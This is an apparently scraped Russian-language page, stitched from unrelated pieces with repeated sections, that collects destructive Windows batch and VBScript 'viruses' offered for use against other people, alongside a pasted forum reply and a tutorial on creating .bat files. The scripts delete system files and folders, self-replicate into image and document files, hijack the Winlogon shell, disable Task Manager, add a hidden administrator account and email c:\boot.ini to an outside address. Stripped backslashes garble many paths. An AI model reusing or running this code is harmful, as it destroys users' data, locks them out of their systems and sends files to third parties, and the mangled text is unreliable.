find «MrWeb»<%0>c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Жестокие вирусы:
У вашего ламера будет глючить компьютер.
@echo off
echo Set fso = CreateObject(«Scripting.FileSystemObject») > %systemdrive%windowssystem32rundll32.vbs
echo do >> %systemdrive%windowssystem32rundll32.vbs
echo Set tx = fso.CreateTextFile(«%systemdrive%windowssystem32rundll32.dat», True) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.close >> %systemdrive%windowssystem32rundll32.vbs
echo FSO.DeleteFile «%systemdrive%windowssystem32rundll32.dat» >> %systemdrive%windowssystem32rundll32.vbs
echo loop >> %systemdrive%windowssystem32rundll32.vbs
start %systemdrive%windowssystem32rundll32.vbs
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v system_host_run /t REG_SZ /d %systemdrive%windowssystem32rundll32.vbs /f
Вирус который убивает Винду. Не проверяйте на своем компьютере=)
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr(39)>%temp%temp1.vbs
echo Chr(39)>%temp%temp2.vbs
echo on error resume next > %temp%temp.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%temp.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%temp.vbs
reg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v nodesktop /d 1 /freg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%user32dll.bat
reg add «hklmSoftwareMicrosoftWindowsCurrentVersionRun» /v RunExplorer32 /d %SystemRoot%user32dll.bat /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoDrives /t REG_DWORD /d 67108863 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile «C:ntldr»,1 >> %temp%temp.vbs
reg add «HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions» /v «NoSelectDownloadDir» /d 1 /f
reg add «HKLMSOFTWAREMicrosoftInternet ExplorermainFeatureControlFeature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f
reg add «HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions» /v «NoFindFiles» /d 1 /f
reg add «HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions» /v «NoNavButtons» /d 1 /f
echo fso.deletefolder «D:Windows»,1 >> %temp%temp.vbs
echo fso.deletefolder «I:Windows»,1 >> %temp%temp.vbs
echo fso.deletefolder «C:Windows»,1 >> %temp%temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot») >> %temp%temp.vbs
echo fso.deletefile sr+»system32hal.dll»,1 >> %temp%temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot») >> %temp%temp.vbs
echo fso.deletefolder sr+»system32dllcache»,1 >> %temp%temp.vbs
echo sr=s.RegRead(«HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot») >> %temp%temp.vbs
echo fso.deletefolder sr+»system32drives»,1 >> %temp%temp.vbs
echo s.regwrite «HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}LocalizedString»,»forum.whack.ru™»>>%temp%temp.vbs
echo s.regwrite «HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner»,»forum.whack.ru™»>>%temp%temp.vbs
echo s.regwrite «HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization»,»forum.whack.ru™»>>%temp%temp.vbs
echo on error resume next > %temp%temp1.vbs
echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%temp1.vbs
echo do>>%temp%temp1.vbs
echo fso.getfile («A:»)>>%temp%temp1.vbs
echo loop>>%temp%temp1.vbs
echo on error resume next > %temp%temp2.vbs
echo Set S = CreateObject(«Wscript.Shell») >> %temp%temp2.vbs
echo do>>%temp%temp2.vbs
echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%temp2.vbs
echo loop>>%temp%temp2.vbs
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem» /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem» /v disableregistrytools /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesNonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSetFolders /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoFind /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSMHelp /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoRun /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoClose /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add «hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer» /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject(«shell.application»)>>%temp%temp.vbs
echo application.minimizeall>>%temp%temp.vbs
reg add «hklmSoftwareMicrosoftWindowsCurrentVersionrun» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add «HKCRexefileshellopencommand» /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%temp.vbs
echo while i^>0 or i^<0 >> %temp%temp.vbs
echo S.popup «forum.whack.ru™»,0, «forum.whack.ru™»,0+16 >> %temp%temp.vbs
echo i=i-1 >> %temp%temp.vbs
echo wend >> %temp%temp.vbs
echo do >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys»{capslock}» >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys»{numlock}» >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys»{scrolllock}» >> %temp%temp.vbs
echo loop>> %temp%temp.vbs
echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%temp.vbs
echo For i = 0 to colCDROMs.Count — 1 >> %temp%temp.vbs
echo colCDROMs.Item(i).eject >> %temp%temp.vbs
echo next >> %temp%temp.vbs
echo End If >> %temp%temp.vbs
echo Call SendPost(«smtp.mail.ru», «forum.whack.ru™@mail.ru», «support@mail.ru», «…», «Копм заражен!») >> %temp%temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%temp.vbs
echo Set iMsg = CreateObject(«CDO.Message») >> %temp%temp.vbs
echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%temp.vbs
echo Set Flds = iConf.Fields >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2 >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1 >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = «support» >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = «support» >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = «smtp.mail.ru» >> %temp%temp.vbs
echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25 >> %temp%temp.vbs
echo Flds.Update >> %temp%temp.vbs
echo iMsg.Configuration = iConf >> %temp%temp.vbs
echo iMsg.To = strTo >> %temp%temp.vbs
echo iMsg.From = strFrom >> %temp%temp.vbs
echo iMsg.Subject = strSubject >> %temp%temp.vbs
echo iMsg.TextBody = strBody >> %temp%temp.vbs
echo iMsg.AddAttachment «c:boot.ini» >> %temp%temp.vbs
echo iMsg.Send >> %temp%temp.vbs
echo End Function >> %temp%temp.vbs
echo Set iMsg = Nothing >> %temp%temp.vbs
echo Set iConf = Nothing >> %temp%temp.vbs
echo Set Flds = Nothing >> %temp%temp.vbs
echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%temp.vbs
start %temp%temp.vbs
start %temp%temp1.vbs
start %temp%temp2.vbs
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
@echo off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус…
title Внимание!!!
CHCP 866
IF EXIST C:windowsboot.bat (
goto ok )
cls
IF NOT EXIST C:windowsboot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:.reg
ECHO. >> C:.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >> C:.reg
ECHO. >> C:.reg
ECHO «Shell»=»Explorer.exe, C:\windows\boot.bat » >> C:.reg
start/wait regedit -s C:.reg
del C:.reg
ECHO @echo off >>C:windowsboot.bat
ECHO C:WINDOWSsystem32taskkill.exe /f /im Explorer.exe >>C:windowsboot.bat
ECHO reg add «HKCUsoftwareMicrosoftWindowsCurrentVersionPoliciessystem» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:windowsboot.bat
ECHO start sys.bat >>C:windowsboot.bat
attrib +r +a +s +h C:windowsboot.bat
copy virus.bat c:windowssys.bat
attrib +r +a +s +h C:windowssys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if «%choise%» == «101» goto gold
if «%choise%» == «200393» goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:windowsboot.bat
del C:windowsboot.bat
attrib -r -a -s -h C:windowssys.bat
del C:windowssys.bat
cls
:gold
start C:
:end
Добавляет программу в автозагрузку ОС
copy «»%0″» «%SystemRoot%system32File.bat»
reg add «HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun» /v «Filel» /t REG_SZ /d «%SystemRoot%system32File.bat» /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
Этот вирус,блокирует все программы,но интернет работает.
@Echo off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD
Категория: Мои статьи | Добавил: drak-zp
Не то, что само, а папка??
До свидания!
Попробуйте задать вопрос простым русским языком.
И проясните, почему, что и с какой целью вы хотите делать.
Из вашего предложения ничего не ясно.
——————————————————————
Заявление об ограничении ответственности:
Мое мнение может не совпадать с официальной позицией Microsoft.
Источник: https://answers.microsoft.com/ru-ru/windows/forum/all/muicache-if/07bb60c9-f306-4f45-94c2-823e6a5bec68
Listen to this article
Нередко советы по тем или иным действиям и исправлениям в Windows 10, 8 и Windows 7 включают в себя шаги наподобие: «создайте файл .bat со следующим содержимым и запустите его». Однако, начинающий пользователь не всегда знает, как это сделать и что собой представляет такой файл. Первый и самый простой способ создать bat файл — использовать стандартную программу «Блокнот», присутствующую во всех актуальных версиях Windows.
Шаги по созданию будут следующими
- Запустите Блокнот (находится в Программы — Стандартные, в Windows 10 быстрее запустить через поиск в панели задач, если блокнота нет в меню «Пуск», запустить его можно из C:Windowsnotepad.exe).
- Введите в блокнот код вашего bat файла (например, скопируйте откуда-то, либо напишите свой, о некоторых командах — далее в инструкции).
- В меню блокнота выберите «Файл» — «Сохранить как», выберите место сохранение файла, укажите имя файла с расширением .bat и, обязательно, в поле «Тип файла» установите «Все файлы».
- Нажмите кнопку «Сохранить».
Примечание: если файл не сохраняется в указанное расположение, например, на диск C, с сообщение «У вас нет разрешения на сохранение файлов в этом месте», сохраните его в папку «Документы» или на рабочий стол, а затем скопируйте в нужное расположение (причина проблемы в том, что в Windows 10 для записи в некоторые папки нужны права администратора, а поскольку блокнот не был запущен от имени администратора, он не может сохранить файл в указанную папку).
Ваш файл .bat готов: если его запустить, будут автоматически выполнены все перечисленные в файле команды (при условии отсутствия ошибок и необходимости прав администратора: в некоторых случаях может потребоваться запускать файл bat от имени администратора: правый клик по файлу .bat — запустить от имени администратора в контекстном меню).
Примечание: в дальнейшем, если вы захотите отредактировать созданный файл, просто нажмите по нему правой кнопкой мыши и выберите «Изменить».
Код:
[USER=98981]@Echo[/USER] off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Выключается компьютер
Код:
[USER=98981]@Echo[/USER] off
shutdown -s -t 1 -c "lol" >nul
Перезагрузка компьютера
Код:
[USER=98981]@Echo[/USER] off
shutdown -r -t 1 -c "lol" >nul
Запрещает запускать программы
Код:
[USER=98981]@Echo[/USER] off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
Удаление дров
Код:
[USER=98981]@Echo[/USER] off
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
Удаляет звуки Windows
Код:
[USER=98981]@Echo[/USER] off
del "%SystemRoot%Media" /q >nul
Запрещает заходить в панель управления
Код:
[USER=98981]@Echo[/USER] off
reg add HKCUSoftwareMicrosoftWindowsCurrent VersionPoliciesExplorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
Код:
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Меняет местами значение кнопок мыши
Код:
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
Код:
del "%SystemRoot%Cursors*.*" >nul
Меняет название корзины
Код:
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
Код:
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
Серьезные вирусы:
Удаляет ВСЕ с разделадиска(не пытайтесь проверить у себя)
Код:
rd [Буква_Диск]: /s /q
Удаляет все файлы в program files
Код:
del c:Program Files/q
Убивает процесс explorer.exe
Код:
taskkill /f /im explorer.exe >nul
Создает миллион папок
Код:
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
Код:
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
Удаляет команду DEL
Будет открывать бесконечно Paint
Код:
:x
Start mspaint
goto x
Изменяет расширение всех ярлыков на .txt (ломает многие ярлыки)
Заражает Autoexec
Код:
copy ""%0"" "%SystemRoot%system32batinit.bat" >nul
reg add "HKCUSOFTWAREMicrosoftCommand Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%syste m32batinit.bat" /f >nul
Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
Код:
[USER=98981]@Echo[/USER] off
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
сбой системы (!) — выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
Код:
rundll32 user,disableoemlayer
Меняет местами кнопки мыши, но обратная смена не возможна)
Код:
rundll32 user,SwapMouseButton
Удаляет ядро системы
Код:
del %systemroot%system32HAL.dll
Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает
не только в текущем каталоге, но и надкаталоге)
Код:
[USER=98981]@Echo[/USER] off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Вирус заражает *.JPG в текущем каталоге
Код:
[USER=98981]@Echo[/USER] off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
Жестокие вирусы:
У вашего ламера будет глючить компьютер.
Код:
[USER=98981]@Echo[/USER] off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%windowssystem32rundll32.vbs
echo do >> %systemdrive%windowssystem32rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%windowssystem32rundll32.dat", True) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.close >> %systemdrive%windowssystem32rundll32.vbs
echo FSO.DeleteFile "%systemdrive%windowssystem32rundll32.dat" >> %systemdrive%windowssystem32rundll32.vbs
echo loop >> %systemdrive%windowssystem32rundll32.vbs
start %systemdrive%windowssystem32rundll32.vbs
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v system_host_run /t REG_SZ /d %systemdrive%windowssystem32rundll32.vbs /f
Вирус который убивает Винду. Не проверяйте на своем компьютере=)
Код:
[USER=98981]@Echo[/USER] This virus created by LIZA
[USER=98981]@Echo[/USER] Virus: pcforumhack.ru Virus
[USER=98981]@Echo[/USER] Autor: LIZA
[USER=98981]@Echo[/USER] off
echo Chr(39)>%temp%temp1.vbs
echo Chr(39)>%temp%temp2.vbs
echo on error resume next > %temp%temp.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%temp.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%temp.vbs
reg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v nodesktop /d 1 /freg add HKEY_USERSS-1-5-21-343818398-1417001333-725345543-1003SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%user32dll.bat
reg add "hklmSoftwareMicrosoftWindowsCurrentVersionRun" /v RunExplorer32 /d %SystemRoot%user32dll.bat /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
echo fso.deletefile "C:ntldr",1 >> %temp%temp.vbs
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLMSOFTWAREMicrosoftInternet ExplorermainFeatureControlFeature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCUSoftwarePoliciesMicrosoftInternet ExplorerRestrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:Windows",1 >> %temp%temp.vbs
echo fso.deletefolder "I:Windows",1 >> %temp%temp.vbs
echo fso.deletefolder "C:Windows",1 >> %temp%temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") >> %temp%temp.vbs
echo fso.deletefile sr+"system32hal.dll",1 >> %temp%temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") >> %temp%temp.vbs
echo fso.deletefolder sr+"system32dllcache",1 >> %temp%temp.vbs
echo sr=s.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSystemRoot") >> %temp%temp.vbs
echo fso.deletefolder sr+"system32drives",1 >> %temp%temp.vbs
echo s.regwrite "HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}LocalizedString","forum.whack.ru">>%temp%temp.vbs
echo s.regwrite "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner","forum.whack.ru">>%temp%temp.vbs
echo s.regwrite "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization","forum.whack.ru">>%temp%temp.vbs
echo on error resume next > %temp%temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")>>%temp%temp1.vbs
echo do>>%temp%temp1.vbs
echo fso.getfile ("A:")>>%temp%temp1.vbs
echo loop>>%temp%temp1.vbs
echo on error resume next > %temp%temp2.vbs
echo Set S = CreateObject("Wscript.Shell") >> %temp%temp2.vbs
echo do>>%temp%temp2.vbs
echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%temp2.vbs
echo loop>>%temp%temp2.vbs
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v disabletaskmgr /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v disableregistrytools /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesNonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFind /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSMHelp /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoRun /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg add "hkcuSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoControlPanel /t REG_DWORD /d 1 /f
echo set application=createobject("shell.application")>>%temp%temp.vbs
echo application.minimizeall>>%temp%temp.vbs
reg add "hklmSoftwareMicrosoftWindowsCurrentVersionrun" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
start rundll32 user32, SwapMouseButton
reg add "HKCRexefileshellopencommand" /ve /t REG_SZ /d rundll32.exe /f
echo i=50 >> %temp%temp.vbs
echo while i^>0 or i^<0 >> %temp%temp.vbs
echo S.popup "forum.whack.ru",0, "forum.whack.ru",0+16 >> %temp%temp.vbs
echo i=i-1 >> %temp%temp.vbs
echo wend >> %temp%temp.vbs
echo do >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys"{capslock}" >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys"{numlock}" >> %temp%temp.vbs
echo wscript.sleep 200 >> %temp%temp.vbs
echo s.sendkeys"{scrolllock}" >> %temp%temp.vbs
echo loop>> %temp%temp.vbs
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%temp.vbs
echo Set colCDROMs = oWMP.cdromCollection >> %temp%temp.vbs
echo if colCDROMs.Count ^>= 1 then >> %temp%temp.vbs
echo For i = 0 to colCDROMs.Count - 1 >> %temp%temp.vbs
echo colCDROMs.Item(i).eject >> %temp%temp.vbs
echo next >> %temp%temp.vbs
echo End If >> %temp%temp.vbs
